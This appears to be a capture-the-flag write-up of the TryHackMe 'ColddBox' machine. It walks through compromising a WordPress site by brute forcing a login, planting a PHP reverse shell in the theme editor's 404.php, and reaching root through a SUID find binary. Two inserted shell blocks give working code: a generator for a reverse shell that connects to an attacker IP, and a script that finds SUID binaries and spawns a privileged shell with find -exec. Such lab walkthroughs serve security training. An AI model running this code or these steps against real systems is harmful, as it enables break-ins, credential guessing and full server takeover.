Greetings everyone!
We’re back with another box; this one is called ColddBox and it lives on the TryHackMe platform! So let’s jump right into it!
We’ll start off with an Nmap scan to see what ports are open and what services are running on them. To do this, we’ll use this command: nmap -A -p- -T4 10.10.150.55 (-A turns on OS and version detection plus the default scripts, -p- scans all 65535 TCP ports instead of the default top 1000, and -T4 speeds up the timing).
Port 80 is open so let’s begin by browsing to the website:
We know from the nmap output (its http-generator script reads the site’s meta generator tag) that this is a WordPress site. Let’s do some directory busting against the web root using a tool called gobuster:
Hmm, it looks like there is a rather interesting directory called “hidden”. Let’s check it out!
We are greeted with a message! Apparently someone named C0ldd is being asked to send Hugo his new password. Looking at this, we have three potential usernames to work with: C0ldd, Hugo, and Philip.
What we’re going to do next is load up a tool called WPScan to see if we can brute force the WordPress login password for one of these users. It’s worth letting WPScan enumerate users first (its -e u option) so we only spend attempts on accounts that actually exist.
We’re using the RockYou wordlist for the password brute-forcing and targeting the three usernames noted above.
Eventually we get a successful hit!
Alright, let’s try logging in with these found credentials.
Success!
So what do we do now? After some poking around, we can draw our attention to the “Theme Editor” entry under the Appearance section. Note that this editor only appears for accounts with the edit_themes capability (administrators), and it disappears entirely if the site sets DISALLOW_FILE_EDIT in wp-config.php, so not every set of valid credentials gets you here:
In this section, there are a few templates listed. If we choose the TwentyFifteen theme and select the 404.php template, we can delete its contents and replace them with a reverse shell. For this, I used the PHP reverse shell that can be found on https://pentestmonkey.net/.
Don’t forget to change the $ip and $port variables near the top of that script to your attacker machine’s address and the port you’ll listen on!
Save the edited 404.php template with the reverse shell. Now let’s open up a netcat listener:
With our listener ready to go, we can now browse to where we’d originally receive the 404 error message on the WordPress site. Because theme template files are served directly by the web server, requesting /wp-content/themes/twentyfifteen/404.php on the target also runs the payload, with no need to hunt for a page that 404s.
This should look like it’s constantly trying to load, and that’s fine: the PHP process is blocked serving our shell, so the HTTP response never completes. Let’s check out our listener:
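As an added example (this is not code from the write-up, nor pentestmonkey’s script), here is a small shell helper that generates a minimal PHP reverse shell to paste into the 404.php template and prints the URL that fetches the edited template directly. The attacker address 10.9.1.2, port 4444 and the target base URL are placeholders you must replace.

```shell
#!/usr/bin/env bash
# Added example, not from the ColddBox write-up or pentestmonkey.
# ATTACKER IP/port and the target URL are placeholders (assumptions).

# Emit a minimal PHP reverse shell that connects back to $1:$2.
# fsockopen opens the socket and proc_open hands it to /bin/sh as
# stdin, stdout and stderr, the same idea as pentestmonkey's script
# but short enough to paste into the theme editor by hand.
build_php_reverse_shell() {
  local ip="$1" port="$2"
  cat <<EOF
<?php
// Reverse shell: connect back to ${ip}:${port} and wire the socket to /bin/sh
\$sock = fsockopen("${ip}", ${port});
if (!\$sock) { die("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
if (is_resource(\$proc)) { proc_close(\$proc); }
EOF
}

# Write the payload to a file so it can be pasted into
# Appearance > Theme Editor > 404.php on the target.
write_payload() {
  build_php_reverse_shell "$1" "$2" > "$3"
}

# Theme template files are served directly, so the edited 404.php can be
# requested by path instead of browsing to a page that happens to 404.
# Usage: trigger_url http://10.10.150.55 twentyfifteen
trigger_url() {
  local base="${1%/}" theme="$2"
  printf '%s/wp-content/themes/%s/404.php\n' "$base" "$theme"
}
```

Typical flow: write_payload 10.9.1.2 4444 shell.php, paste the file into the editor and save, start nc -lvnp 4444 on the attacker box, then curl -s "$(trigger_url http://10.10.150.55 twentyfifteen)" from a second terminal; the curl will hang for as long as the shell lives, which is expected.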
We now have a working shell on the victim machine!
We’re user www-data, so we’ll need to escalate our privileges. First, let’s upgrade to a proper interactive TTY so the shell survives things like su and tab completion:
Perfect! To help with our privilege escalation, we’ll be using a tool called LinPEAS. Let’s open up an HTTP server on our attacker machine to prepare for transferring the script over to the victim machine.
With the server up, let’s switch back over to the victim machine and use wget to grab our LinPeas script:
We’ll need to make it executable, then we can run it.
We’ll get a lot of information returned to us, but under the SUID section this stands out:
Looks like the find binary has the setuid bit set and is owned by root, which we may be able to abuse to escalate to root access! Checking GTFOBins, it states this:
Seems simple enough, so let’s try it!
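As an added example (not code from the write-up, LinPEAS or GTFOBins), the following shell functions reproduce the SUID check that flagged find, cross-reference the results against a short list of binaries GTFOBins knows how to abuse, and wrap the GTFOBins find trick in a guarded function. The path /usr/bin/find is an assumption; run it on the target as www-data.

```shell
#!/usr/bin/env bash
# Added example, not from the write-up, LinPEAS or GTFOBins.
# /usr/bin/find as the default path is an assumption.

# List setuid files under a directory, which is what LinPEAS's SUID section
# boils down to. -xdev stays on one filesystem; errors from unreadable
# directories are discarded.
list_suid() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Succeed only if the file is setuid AND owned by root. A setuid bit on a
# file owned by www-data gains us nothing.
is_suid_root() {
  local f="$1"
  [ -u "$f" ] || return 1
  [ "$(find "$f" -maxdepth 0 -user root 2>/dev/null)" = "$f" ]
}

# Names whose SUID entry on GTFOBins yields a shell (non-exhaustive; always
# look the binary up there yourself before trying anything).
GTFO_SUID="find bash env perl python python3 php vim awk"

# Print every setuid file under $1 whose basename is on the list above.
flag_gtfobins_suid() {
  local f name
  list_suid "$1" | while IFS= read -r f; do
    name="$(basename "$f")"
    case " $GTFO_SUID " in
      *" $name "*) printf '%s\n' "$f" ;;
    esac
  done
}

# The GTFOBins command itself: find runs /bin/sh via -exec for the first
# match (-quit stops it there), and sh -p keeps the inherited effective UID
# instead of dropping it back to www-data (bash drops it without -p).
# Refuses to run unless the binary really is setuid root, so a failed
# attempt tells you why instead of silently giving you a www-data shell.
suid_find_shell() {
  local findbin="${1:-/usr/bin/find}"
  is_suid_root "$findbin" || { printf '%s is not setuid root\n' "$findbin" >&2; return 1; }
  "$findbin" . -exec /bin/sh -p \; -quit
}
```

On the target, flag_gtfobins_suid / should print the find binary; then suid_find_shell /usr/bin/find drops you into the privileged shell. Check it with id: because of -p the real uid stays www-data while euid=0(root), which is enough to read /root and write anywhere root can.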
Wooo! Root access!
Thanks for reading!